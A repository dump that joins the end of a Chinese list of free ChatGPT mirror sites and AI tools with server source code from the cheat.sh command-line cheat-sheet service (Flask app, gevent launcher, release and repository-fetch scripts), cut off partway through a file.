<td>2023-05-28</td> </tr> <tr> <td>60</td> <td><del> <a href="https://askgptai.com/" target="_blank">https://askgptai.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>61</td> <td><del> <a href="https://chat.paoying.net/" target="_blank">https://chat.paoying.net/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>62</td> <td><del> <a href="https://chats.wxredcover.cn/" target="_blank">https://chats.wxredcover.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>63</td> <td><del> <a href="https://chat.zecoba.cn/" target="_blank">https://chat.zecoba.cn/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>64</td> <td><del> <a href="https://account.eaten.fun" target="_blank">https://account.eaten.fun</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>65</td> <td><del> <a href="https://chat.livepo.top/" target="_blank">https://chat.livepo.top/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>66</td> <td><del> <a href="https://askbot.club/chatgpt" target="_blank">https://askbot.club/chatgpt</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>67</td> <td><del> <a href="https://talk.xiu.ee/" target="_blank">https://talk.xiu.ee/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>68</td> <td><del> <a href="https://1chat.c3r.ink/" target="_blank">https://1chat.c3r.ink/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>69</td> <td><del> <a href="https://ai.icodebug.xyz/" target="_blank">https://ai.icodebug.xyz/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>70</td> <td><del> <a href="https://aitxt.io/" target="_blank">https://aitxt.io/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>71</td> <td><del> <a href="https://chat.v50.ltd" target="_blank">https://chat.v50.ltd</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>72</td> <td><del> <a href="https://1.nb8.ltd/" target="_blank">https://1.nb8.ltd/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>73</td> <td><del> <a href="https://srgfdfsf.xiaowenzi.xyz/" target="_blank">https://srgfdfsf.xiaowenzi.xyz/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>74</td> <td><del> <a href="https://chataibase.com/" target="_blank">https://chataibase.com/</a> </del> </td> <td>2023-05-28</td> </tr> <tr> <td>75</td> <td><del> <a href="https://aiia.chat/" target="_blank">https://aiia.chat/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>76</td> <td><del> <a href="https://1919abc.com" target="_blank">https://1919abc.com</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>77</td> <td><del> <a href="https://chat.bk8787.com/" target="_blank">https://chat.bk8787.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>78</td> <td><del> <a href="https://chatgpt.dreamtrend.net/" target="_blank">https://chatgpt.dreamtrend.net/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>79</td> <td><del> <a href="http://1.15.134.164:999/" target="_blank">http://1.15.134.164:999/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>80</td> <td><del> <a href="https://chat.aidutu.cn/" target="_blank">https://chat.aidutu.cn/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>81</td> <td><del> <a href="http://207.148.94.37:7860/" target="_blank">http://207.148.94.37:7860/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>82</td> <td><del> <a href="https://ai-pig-fly.space/" target="_blank">https://ai-pig-fly.space/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>83</td> <td><del> <a href="https://gpt.ai8.icu/" target="_blank">https://gpt.ai8.icu/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>84</td> <td><del> <a href="https://x1.xjai.cc/" target="_blank">https://x1.xjai.cc/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>85</td> <td><del> <a href="http://chat.cutim.one/" target="_blank">http://chat.cutim.one/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>86</td> <td><del> <a href="http://chat.cutim.top/" target="_blank">http://chat.cutim.top/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>87</td> <td><del> <a href="https://chat.xiami.one/" target="_blank">https://chat.xiami.one/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>88</td> <td><del> <a href="https://chat.gptplus.one/" target="_blank">https://chat.gptplus.one/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>89</td> <td><del> <a href="http://www.msai.fun/" target="_blank">http://www.msai.fun/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>90</td> <td><del> <a href="https://chatmindai.com/#/chat" target="_blank">https://chatmindai.com/#/chat</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>91</td> <td><del> <a href="https://aigcfun.com/" target="_blank">https://aigcfun.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>92</td> <td><del> <a href="https://www.chat2ai.cn/" target="_blank">https://www.chat2ai.cn/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>93</td> <td><del> <a href="https://ai.yiios.com/" target="_blank">https://ai.yiios.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>94</td> <td><del> <a href="https://ai117.com/" target="_blank">https://ai117.com/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>95</td> <td><del> <a href="https://chat.forchange.cn/" target="_blank">https://chat.forchange.cn/</a> </del> </td> <td>2023-05-26</td> </tr> <tr> <td>96</td> <td><del> <a href="https://w.betai55.uk/" target="_blank">https://w.betai55.uk/</a> </del> </td> <td>2023-05-25</td> </tr> <tr> <td>97</td> <td><del> <a href="https://1chat.cc/" target="_blank">https://1chat.cc/</a> </del> </td> <td>2023-05-24</td> </tr> <tr> <td>98</td> <td><del> <a href="https://gpt.opengpt88.com/" target="_blank">https://gpt.opengpt88.com/</a> </del> </td> <td>2023-05-07</td> </tr> <tr> <td>99</td> <td><del> <a href="https://seven-star.org/" target="_blank">https://seven-star.org/</a> </del> </td> <td>2023-05-06</td> </tr> <tr> <td>100</td> <td><del> <a href="https://tubogpt.vercel.app/" target="_blank">https://tubogpt.vercel.app/</a> </del> </td> <td>2023-05-06</td> </tr> <tr> <td>101</td> <td><del> <a href="http://www.tdchatd.us" target="_blank">http://www.tdchatd.us</a> </del> </td> <td>2023-05-05</td> </tr> <tr> <td>102</td> <td><del> <a href="https://gpt.gpt0.icu/" target="_blank">https://gpt.gpt0.icu/</a> </del> </td> <td>2023-04-28</td> </tr> <tr> <td>103</td> <td><del> <a href="https://chat.hehanwang.com/" target="_blank">https://chat.hehanwang.com/</a> </del> </td> <td>2023-04-25</td> </tr> <tr> <td>104</td> <td><del> <a href="https://chat.8kg.co/" target="_blank">https://chat.8kg.co/</a> </del> </td> <td>2023-04-21</td> </tr> <tr> <td>105</td> <td><del> <a href="https://chat2.zhuleixx.top/" target="_blank">https://chat2.zhuleixx.top/</a> </del> </td> <td>2023-04-21</td> </tr> <tr> <td>106</td> <td><del> <a href="https://chat.ohtoai.com/" target="_blank">https://chat.ohtoai.com/</a> </del> </td> <td>2023-04-20</td> </tr> <tr> <td>107</td> <td><del> <a href="https://ai.zyun.vip/" target="_blank">https://ai.zyun.vip/</a> </del> </td> <td>2023-04-20</td> </tr> <tr> <td>108</td> <td><del> <a href="http://www.tdchat.vip/" target="_blank">http://www.tdchat.vip/</a> </del> </td> <td>2023-04-20</td> </tr> <tr> <td>109</td> <td><del> <a href="https://ai.bo-e.com/" target="_blank">https://ai.bo-e.com/</a> </del> </td> <td>2023-04-18</td> </tr> <tr> <td>110</td> <td><del> <a href="https://chat.zhuleixx.top/" target="_blank">https://chat.zhuleixx.top/</a> </del> </td> <td>2023-04-16</td> </tr> <tr> <td>111</td> <td><del> <a href="https://www.tdchat.com/" target="_blank">https://www.tdchat.com/</a> </del> </td> <td>2023-04-13</td> </tr> <tr> <td>112</td> <td><del> <a href="https://gpt6.fun/" target="_blank">https://gpt6.fun/</a> </del> </td> <td>2023-04-11</td> </tr> <tr> <td>113</td> <td><del> <a href="https://chatgpt3.fun/" target="_blank">https://chatgpt3.fun/</a> </del> </td> <td>2023-04-11</td> </tr> <tr> <td>114</td> <td><del> <a href="https://heimoshuiyu.github.io/chatgpt-api-web/" target="_blank">https://heimoshuiyu.github.io/chatgpt-api-web/</a> </del> </td> <td>2023-04-10</td> </tr> <tr> <td>115</td> <td><del> <a href="http://gitopenchina.gitee.io/freechatgpt" target="_blank">http://gitopenchina.gitee.io/freechatgpt</a> </del> </td> <td>2023-04-10</td> </tr> <tr> <td>116</td> <td><del> <a href="https://freegpt.one/" target="_blank">https://freegpt.one/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>117</td> <td><del> <a href="http://gitopenchina.gitee.io/gpt" target="_blank">http://gitopenchina.gitee.io/gpt</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>118</td> <td><del> <a href="http://gitopenchina.gitee.io/chatgpt" target="_blank">http://gitopenchina.gitee.io/chatgpt</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>119</td> <td><del> <a href="https://qachat.vercel.app/" target="_blank">https://qachat.vercel.app/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>120</td> <td><del> <a href="https://chat.tgbot.co/" target="_blank">https://chat.tgbot.co/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>121</td> <td><del> <a href="https://chatgpt.ddiu.me/" target="_blank">https://chatgpt.ddiu.me/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>122</td> <td><del> <a href="https://chat.yqcloud.top/" target="_blank">https://chat.yqcloud.top/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>123</td> <td><del> <a href="https://www.aitoolgpt.com/" target="_blank">https://www.aitoolgpt.com/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>124</td> <td><del> <a href="https://www.chatsverse.xyz/" target="_blank">https://www.chatsverse.xyz/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>125</td> <td><del> <a href="https://chat.ninvfeng.xyz/" target="_blank">https://chat.ninvfeng.xyz/</a> </del> </td> <td>2023-04-04</td> </tr> <tr> <td>126</td> <td><del> <a href="https://qachat.cn/" target="_blank">https://qachat.cn/</a> </del> </td> <td>2023-04-03</td> </tr> <tr> <td>127</td> <td><del> <a href="https://greengpt.app/" target="_blank">https://greengpt.app/</a> </del> </td> <td>2023-04-01</td> </tr> <tr> <td>128</td> <td><del> <a href="https://www.askme.mom/" target="_blank">https://www.askme.mom/</a> </del> </td> <td>2023-04-01</td> </tr> <tr> <td>129</td> <td><del> <a href="https://www.bz1y.cn/" target="_blank">https://www.bz1y.cn/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>130</td> <td><del> <a href="https://xc.com/" target="_blank">https://xc.com/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>131</td> <td><del> <a href="https://www.scyu.app/" target="_blank">https://www.scyu.app/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>132</td> <td><del> <a href="https://chatgpt-flutter.h7ml.cn/" target="_blank">https://chatgpt-flutter.h7ml.cn/</a> </del> </td> <td>2023-03-22</td> </tr> <tr> <td>133</td> <td><del> <a href="https://chatapi.qload.cn/" target="_blank">https://chatapi.qload.cn/</a> </del> </td> <td>2023-03-22</td> </tr> </tbody> </table> <!-- abnormal-end --> </details> ## 🗨️ ChatGPT 替代方案 - 👍 [Poe - Fast, Helpful AI Chat](https://poe.com) - 在 Poe 上可与 ChatGPT、GPT-4o、Claude-3-Opus、DALLE 3 等数百万机器人交谈。 - [HuggingChat](https://huggingface.co/chat) - 让社区最好的 AI 聊天模型对所有人可用。 - [DuckDuckGo AI Chat](https://duckduckgo.com/?q=DuckDuckGo+AI+Chat&ia=chat&duckai=1) - 向 DuckDuckGo AI Chat 打个招呼! 匿名使用热门人工智能模型,包括 GPT-3.5、Claude 3 以及开源 Llama 3 和 Mixtral。 - [Chat with Open Large Language Models](https://chat.lmsys.org/) from <https://github.com/lm-sys/FastChat> - An open platform for training, serving, and evaluating large language models. Release repo for Vicuna and FastChat-T5. - [Microsoft Copilot](https://copilot.microsoft.com/) - 你的日常 AI 助手。 - [Meta AI](https://www.meta.ai/) - 使用 Meta AI 助手,免费生成图像,并回答任何问题。 - [Google Gemini](https://gemini.google.com/) - Gemini, 激发你的创造力和生产力。 - [Anthropic Claude](https://claude.ai/) - Claude is a next generation AI assistant built for work and trained to be safe, accurate, and secure. - [百度 文心一言](https://yiyan.baidu.com/) - [Open Assistant](https://open-assistant.io/) - 面向所有人的对话式 AI, 这是一个由 LAION 和全球贡献者共同开发的 GPT LLM 项目. - [阿里 通义大模型](https://tongyi.aliyun.com/) - 阿里大模型统一品牌,覆盖语言、听觉、多模态等领域;致力于实现接近人类智慧的通用智能,让 AI 从“单一感官”到“五官全开” - [讯飞星火认知大模型](https://xinghuo.xfyun.cn/) - 讯飞星火认知大模型,是由科大讯飞推出的大语言模型,能够通过自然语言理解,完成智能对答。 - [Pi, your personal AI](https://heypi.com/talk) - Hi, I'm Pi. I'm your personal AI, designed to be supportive, smart, and there for you anytime. Ask me for advice, for answers, or let's talk about whatever's on your mind. - [TruthGPT Chat](https://talk.truthgpt.one/) - Hey, I’m TruthGPT! The beacon of truth in a world of unknown. We can either have a conversation or you may ask me complex questions! - [昆仑万维天工大模型](https://tiangong.kunlun.com/) - 「天工」是国内首个对标 ChatGPT 的双千亿级大语言模型,也是一个对话式 AI 助手。 - [抖音旗下豆包小助手](https://www.doubao.com/) - 豆包是你的智能小助手,可以为你答疑解惑,提供灵感,辅助创作,也可以和你畅聊任何你感兴趣的话题。 - [OpenAgents](https://github.com/xlang-ai/OpenAgents) - ChatGPT Plus 功能(数据分析,插件,上网)开源复刻项目。 - [智谱清言](https://www.chatglm.cn/) - 智谱 AI 和清华大学 KEG 实验室联合发布的新一代对话预训练模型,基于 ChatGLM2 模型开发,支持多轮对话,具备内容创作、信息归纳总结等能力。 ## 📚 更多... ### 💿 构建你自己的 ChatGPT 镜像 - https://lobechat.com/ - LobeChat:个人 LLM 效能工具,给自己一个更聪明的大脑 - https://github.com/Yidadaa/ChatGPT-Next-Web - One-Click to deploy well-designed ChatGPT web UI on Vercel. 一键拥有你自己的 ChatGPT 网页服务。 - https://github.com/mckaywrigley/chatbot-ui - An open source ChatGPT UI. - https://github.com/Chanzhaoyu/chatgpt-web - 用 Express 和 Vue3 搭建的 ChatGPT 演示网页 - https://github.com/anse-app/chatgpt-demo - Minimal web UI for ChatGPT. - https://github.com/869413421/chatgpt-web - 基于 ChatGPT3.5 API 实现的私有化 web 程序 - https://github.com/ztjhz/BetterChatGPT - An amazing UI for OpenAI's ChatGPT (Website + Windows + MacOS + Linux) - https://github.com/ourongxing/chatgpt-vercel - Elegant and Powerful. Powered by OpenAI and Vercel. ### 💡 提示词(Prompt) - [GPT 最佳实践 - OpenAI API](https://platform.openai.com/docs/guides/gpt-best-practices) - [ChatGPT Prompt Engineering for Developers - DeepLearning.AI](https://www.deeplearning.ai/short-courses/chatgpt-prompt-engineering-for-developers/) - https://github.com/datawhalechina/prompt-engineering-for-developers - 吴恩达《ChatGPT Prompt Engineering for Developers》课程中文版 - https://github.com/f/awesome-chatgpt-prompts - The repo includes ChatGPT prompt curation to use ChatGPT better. ### 📝 自建内容库 - [ChatDOC - Chat with your documents](https://chatdoc.com/) - ChatDOC is a ChatGPT-based file-reading assistant that can quickly extract, locate and summarize information from documents, able to understand texts, tables and images. - [Humata - GPT for your files](https://www.humata.ai/) - Humata is like GPT for your files. Ask AI anything about your data. Ask questions about your data and get answers powered by AI instantly. Learn, summarize, synthesize, and extract valuable data from your files 100X faster. - [Chatbase | ChatGPT for your website](https://www.chatbase.co/) - Build an AI chatbot from your knowledge base and add it to your website. ### 💻 开发者工具 - 👍 [Codeium · Free AI Code Completion & Chat](https://codeium.com/) - Codeium offers best in class AI code completion & search — all for free. It supports over 70+ languages and integrates with your favorite IDEs, with lightning fast speeds and state-of-the-art suggestion quality. - [Cursor | Build Fast](https://www.cursor.so/) - The AI-first code editor. Build software faster in an editor designed for pair-programming with AI - [Bito AI - Become a 10X Dev with Bito AI - Bito](https://bito.ai/) - [Meaningful Code Tests for Busy Devs | CodiumAI](https://www.codium.ai/) - With CodiumAI, you get non-trivial tests suggested right inside your IDE, so you can code smart, create more value, and stay confident when you push. --- ### 🌟 Star History [![Star History Chart](https://api.star-history.com/svg?repos=LiLittleCat/awesome-free-chatgpt&type=Date)](https://star-history.com/#LiLittleCat/awesome-free-chatgpt&Date) ### 💞 Contributors [![Contributors](https://contrib.rocks/image?repo=LiLittleCat/awesome-free-chatgpt)](https://github.com/LiLittleCat/awesome-free-chatgpt/graphs/contributors)
cheat.sh
571377f2f79422398a701cb1864487124ec3dcc6
File: bin/srv.py #!/usr/bin/env python # # Serving cheat.sh with `gevent` # from gevent.monkey import patch_all from gevent.pywsgi import WSGIServer patch_all() import os import sys from app import app, CONFIG if '--debug' in sys.argv: # Not all debug mode features are available under `gevent` # https://github.com/pallets/flask/issues/3825 app.debug = True if 'CHEATSH_PORT' in os.environ: port = int(os.environ.get('CHEATSH_PORT')) else: port = CONFIG['server.port'] srv = WSGIServer((CONFIG['server.bind'], port), app) print("Starting gevent server on {}:{}".format(srv.address[0], srv.address[1])) srv.serve_forever() File: bin/release.py #!/usr/bin/env python from __future__ import print_function from datetime import datetime import os from os import path import re import shutil import subprocess from subprocess import Popen import sys SHARE_DIR = path.join(path.dirname(__file__), "../share/") def run(args): return Popen(args, stdout=sys.stdout, stderr=sys.stderr).wait() status = subprocess.check_output(["git", "status", "--porcelain"]) if len(status) > 0: print("Unclean working tree. Commit or stash changes first.", file=sys.stderr) sys.exit(1) timestamp = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S +0000") cht_curr = path.join(SHARE_DIR, "cht.sh.txt") cht_new = path.join(SHARE_DIR, "cht.sh.txt.new") re_version = re.compile(r"^__CHTSH_VERSION=(.*)$") re_timestamp = re.compile(r"^__CHTSH_DATETIME=.*$") with open(cht_curr, "rt") as fin: with open(cht_new, "wt") as fout: for line in fin: match = re_version.match(line) if match: version = int(match.group(1)) + 1 fout.write("__CHTSH_VERSION=%s\n" % version) continue match = re_timestamp.match(line) if match: fout.write('__CHTSH_DATETIME="%s"\n' % timestamp) continue fout.write(line) shutil.copymode(cht_curr, cht_new) os.remove(cht_curr) os.rename(cht_new, cht_curr) message = "cht: v%s" % version run(["git", "add", cht_curr]) run(["git", "commit", "-m", message]) run(["git", "tag", "cht@%s" % version, "-m", message]) File: bin/clean_cache.py import sys import redis REDIS = redis.Redis(host='localhost', port=6379, db=0) for key in sys.argv[1:]: REDIS.delete(key) File: bin/app.py #!/usr/bin/env python # vim: set encoding=utf-8 # pylint: disable=wrong-import-position,wrong-import-order """ Main server program. Configuration parameters: path.internal.malformed path.internal.static path.internal.templates path.log.main path.log.queries """ from __future__ import print_function import sys if sys.version_info[0] < 3: reload(sys) sys.setdefaultencoding('utf8') import sys import logging import os import requests import jinja2 from flask import Flask, request, send_from_directory, redirect, Response sys.path.append(os.path.abspath(os.path.join(__file__, "..", "..", "lib"))) from config import CONFIG from limits import Limits from cheat_wrapper import cheat_wrapper from post import process_post_request from options import parse_args from stateful_queries import save_query, last_query if not os.path.exists(os.path.dirname(CONFIG["path.log.main"])): os.makedirs(os.path.dirname(CONFIG["path.log.main"])) logging.basicConfig( filename=CONFIG["path.log.main"], level=logging.DEBUG, format='%(asctime)s %(message)s') # Fix Flask "exception and request logging" to `stderr`. # # When Flask's werkzeug detects that logging is already set, it # doesn't add its own logger that prints exceptions. stderr_handler = logging.StreamHandler() logging.getLogger().addHandler(stderr_handler) # # Alter log format to disting log lines from everything else stderr_handler.setFormatter(logging.Formatter('%(filename)s:%(lineno)s: %(message)s')) # # Sometimes werkzeug starts logging before an app is imported # (https://github.com/pallets/werkzeug/issues/1969) # resulting in duplicating lines. In that case we need root # stderr handler to skip lines from werkzeug. class SkipFlaskLogger(object): def filter(self, record): if record.name != 'werkzeug': return True if logging.getLogger('werkzeug').handlers: stderr_handler.addFilter(SkipFlaskLogger()) app = Flask(__name__) # pylint: disable=invalid-name app.jinja_loader = jinja2.ChoiceLoader([ app.jinja_loader, jinja2.FileSystemLoader(CONFIG["path.internal.templates"])]) LIMITS = Limits() PLAIN_TEXT_AGENTS = [ "curl", "httpie", "lwp-request", "wget", "python-requests", "openbsd ftp", "powershell", "fetch", "aiohttp", ] def _is_html_needed(user_agent): """ Basing on `user_agent`, return whether it needs HTML or ANSI """ return all([x not in user_agent for x in PLAIN_TEXT_AGENTS]) def is_result_a_script(query): return query in [':cht.sh'] @app.route('/files/<path:path>') def send_static(path): """ Return static file `path`. Can be served by the HTTP frontend. """ return send_from_directory(CONFIG["path.internal.static"], path) @app.route('/favicon.ico') def send_favicon(): """ Return static file `favicon.ico`. Can be served by the HTTP frontend. """ return send_from_directory(CONFIG["path.internal.static"], 'favicon.ico') @app.route('/malformed-response.html') def send_malformed(): """ Return static file `malformed-response.html`. Can be served by the HTTP frontend. """ dirname, filename = os.path.split(CONFIG["path.internal.malformed"]) return send_from_directory(dirname, filename) def log_query(ip_addr, found, topic, user_agent): """ Log processed query and some internal data """ log_entry = "%s %s %s %s\n" % (ip_addr, found, topic, user_agent) with open(CONFIG["path.log.queries"], 'ab') as my_file: my_file.write(log_entry.encode('utf-8')) def get_request_ip(req): """ Extract IP address from `request` """ if req.headers.getlist("X-Forwarded-For"): ip_addr = req.headers.getlist("X-Forwarded-For")[0] if ip_addr.startswith('::ffff:'): ip_addr = ip_addr[7:] else: ip_addr = req.remote_addr if req.headers.getlist("X-Forwarded-For"): ip_addr = req.headers.getlist("X-Forwarded-For")[0] if ip_addr.startswith('::ffff:'): ip_addr = ip_addr[7:] else: ip_addr = req.remote_addr return ip_addr def get_answer_language(request): """ Return preferred answer language based on domain name, query arguments and headers """ def _parse_accept_language(accept_language): languages = accept_language.split(",") locale_q_pairs = [] for language in languages: try: if language.split(";")[0] == language: # no q => q = 1 locale_q_pairs.append((language.strip(), "1")) else: locale = language.split(";")[0].strip() weight = language.split(";")[1].split("=")[1] locale_q_pairs.append((locale, weight)) except IndexError: pass return locale_q_pairs def _find_supported_language(accepted_languages): for lang_tuple in accepted_languages: lang = lang_tuple[0] if '-' in lang: lang = lang.split('-', 1)[0] return lang return None lang = None hostname = request.headers['Host'] if hostname.endswith('.cheat.sh'): lang = hostname[:-9] if 'lang' in request.args: lang = request.args.get('lang') header_accept_language = request.headers.get('Accept-Language', '') if lang is None and header_accept_language: lang = _find_supported_language( _parse_accept_language(header_accept_language)) return lang def _proxy(*args, **kwargs): # print "method=", request.method, # print "url=", request.url.replace('/:shell-x/', ':3000/') # print "headers=", {key: value for (key, value) in request.headers if key != 'Host'} # print "data=", request.get_data() # print "cookies=", request.cookies # print "allow_redirects=", False url_before, url_after = request.url.split('/:shell-x/', 1) url = url_before + ':3000/' if 'q' in request.args: url_after = '?' + "&".join("arg=%s" % x for x in request.args['q'].split()) url += url_after print(url) print(request.get_data()) resp = requests.request( method=request.method, url=url, headers={key: value for (key, value) in request.headers if key != 'Host'}, data=request.get_data(), cookies=request.cookies, allow_redirects=False) excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection'] headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers] response = Response(resp.content, resp.status_code, headers) return response @app.route("/", methods=['GET', 'POST']) @app.route("/<path:topic>", methods=["GET", "POST"]) def answer(topic=None): """ Main rendering function, it processes incoming weather queries. Depending on user agent it returns output in HTML or ANSI format. Incoming data: request.args request.headers request.remote_addr request.referrer request.query_string """ user_agent = request.headers.get('User-Agent', '').lower() html_needed = _is_html_needed(user_agent) options = parse_args(request.args) if topic in ['apple-touch-icon-precomposed.png', 'apple-touch-icon.png', 'apple-touch-icon-120x120-precomposed.png'] \ or (topic is not None and any(topic.endswith('/'+x) for x in ['favicon.ico'])): return '' request_id = request.cookies.get('id') if topic is not None and topic.lstrip('/') == ':last': if request_id: topic = last_query(request_id) else: return "ERROR: you have to set id for your requests to use /:last\n" else: if request_id: save_query(request_id, topic) if request.method == 'POST': process_post_request(request, html_needed) if html_needed: return redirect("/") return "OK\n" if 'topic' in request.args: return redirect("/%s" % request.args.get('topic')) if topic is None: topic = ":firstpage" if topic.startswith(':shell-x/'): return _proxy() #return requests.get('http://127.0.0.1:3000'+topic[8:]).text lang = get_answer_language(request) if lang: options['lang'] = lang ip_address = get_request_ip(request) if '+' in topic: not_allowed = LIMITS.check_ip(ip_address) if not_allowed: return "429 %s\n" % not_allowed, 429 html_is_needed = _is_html_needed(user_agent) and not is_result_a_script(topic) if html_is_needed: output_format='html' else: output_format='ansi' result, found = cheat_wrapper(topic, request_options=options, output_format=output_format) if 'Please come back in several hours' in result and html_is_needed: malformed_response = open(os.path.join(CONFIG["path.internal.malformed"])).read() return malformed_response log_query(ip_address, found, topic, user_agent) if html_is_needed: return result return Response(result, mimetype='text/plain') File: lib/fetch.py """ Repositories fetch and update This module makes real network and OS interaction, and the adapters only say how exctly this interaction should be done. Configuration parameters: * path.log.fetch """ from __future__ import print_function import sys import logging import os import subprocess import textwrap from globals import fatal import adapter import cache from config import CONFIG def _log(*message): logging.info(*message) if len(message) > 1: message = message[0].rstrip("\n") % tuple(message[1:]) else: message = message[0].rstrip("\n") sys.stdout.write(message+"\n") def _run_cmd(cmd): shell = isinstance(cmd, str) process = subprocess.Popen( cmd, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output = process.communicate()[0] return process.returncode, output def fetch_all(skip_existing=True): """ Fetch all known repositories mentioned in the adapters """ def _fetch_locations(known_location): for location, adptr in known_location.items(): if location in existing_locations: continue cmd = adptr.fetch_command() if not cmd: continue sys.stdout.write("Fetching %s..." % (adptr)) sys.stdout.flush() try: process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) except OSError: print("\nERROR: %s" % cmd) raise output = process.communicate()[0] if process.returncode != 0: sys.stdout.write("\nERROR:\n---\n" + output) fatal("---\nCould not fetch %s" % adptr) else: print("Done") # Searching for location duplicates for different repositories known_location = {} for adptr in adapter.adapter.all_adapters(): location = adptr.local_repository_location() if not location: continue if location in known_location \ and adptr.repository_url() != known_location[location].repository_url(): fatal("Duplicate location: %s for %s and %s" % (location, adptr, known_location[location])) known_location[location] = adptr # Parent directories creation # target subdirectories will be create during the checkout process, # but the parent directories should be created explicitly. # Also we should make sure, that the target directory does not exist existing_locations = [] for location in known_location: if os.path.exists(location): if skip_existing: existing_locations.append(location) print("Already exists %s" % (location)) else: fatal("%s already exists" % location) parent = os.path.dirname(location) if os.path.exists(parent): continue os.makedirs(parent) known_location = {k:v for k, v in known_location.items() if k not in existing_locations} _fetch_locations(known_location) def _update_adapter(adptr): """ Update implementation. If `adptr` returns no update_command(), it is being ignored. """ os.chdir(adptr.local_repository_location()) cmd = adptr.update_command() if not cmd: return True errorcode, output = _run_cmd(cmd) if errorcode: _log("\nERROR:\n---%s\n" % output.decode("utf-8") + "\n---\nCould not update %s" % adptr) return False # Getting current repository state # This state will be saved after the update procedure is finished # (all cache entries invalidated) cmd = adptr.current_state_command() state = None if cmd: errorcode, state = _run_cmd(cmd) if errorcode: _log("\nERROR:\n---\n" + state + "\n---\nCould not get repository state: %s" % adptr) return False state = state.strip() # Getting list of files that were changed # that will be later converted to the list of the pages to be invalidated cmd = adptr.get_updates_list_command() updates = [] if cmd: errorcode, output = _run_cmd(cmd) output = output.decode("utf-8") if errorcode: _log("\nERROR:\n---\n" + output + "\n---\nCould not get list of pages to be updated: %s" % adptr) return False updates = output.splitlines() entries = adptr.get_updates_list(updates) if entries: _log("%s Entries to be updated: %s", adptr, len(entries)) name = adptr.name() for entry in entries: cache_name = name + ":" + entry _log("+ invalidating %s", cache_name) cache.delete(cache_name) if entries: _log("Done") adptr.save_state(state) return True def update_all(): """ Update all known repositories, mentioned in the adapters and fetched locally. If repository is not fetched, it is skipped. """ for adptr in adapter.adapter.all_adapters(): location = adptr.local_repository_location() if not location: continue if not os.path.exists(location): continue _update_adapter(adptr) def update_by_name(name): """ Find adapter by its `name` and update only it. """ pass def _show_usage(): sys.stdout.write(textwrap.dedent(""" Usage: python lib/fetch.py [command] Commands: update-all -- update all configured repositories update [name] -- update repository of the adapter `name` fetch-all -- fetch all configured repositories """)) def main(args): """ function for the initial repositories fetch and manual repositories updates """ if not args: _show_usage() sys.exit(0) logdir = os.path.dirname(CONFIG["path.log.fetch"]) if not os.path.exists(logdir): os.makedirs(logdir) logging.basicConfig( filename=CONFIG["path.log.fetch"], level=logging.DEBUG, format='%(asctime)s %(message)s') if args[0] == 'fetch-all': fetch_all() elif args[0] == 'update': update_by_name(sys.argv[1]) elif args[0] == 'update-all': update_all() else: _show_usage() sys.exit(0) if __name__ == '__main__': main(sys.argv[1:]) File: lib/options.py """ Parse query arguments. """ def parse_args(args): """ Parse arguments and options. Replace short options with their long counterparts. """ result = { 'add_comments': True, } query = "" newargs = {} for key, val in args.items(): if val == "" or val == [] or val == ['']: query += key continue if val == 'True': val = True if val == 'False': val = False newargs[key] = val options_meaning = { "c": dict(add_comments=False, unindent_code=False), "C": dict(add_comments=False, unindent_code=True), "Q": dict(remove_text=True), 'q': dict(quiet=True), 'T': {'no-terminal': True}, } for option, meaning in options_meaning.items(): if option in query: result.update(meaning) result.update(newargs) return result File: lib/post.py """ POST requests processing. Currently used only for new cheat sheets submission. Configuration parameters: path.spool """ import string import os import random from config import CONFIG def _save_cheatsheet(topic_name, cheatsheet): """ Save posted cheat sheet `cheatsheet` with `topic_name` in the spool directory """ nonce = 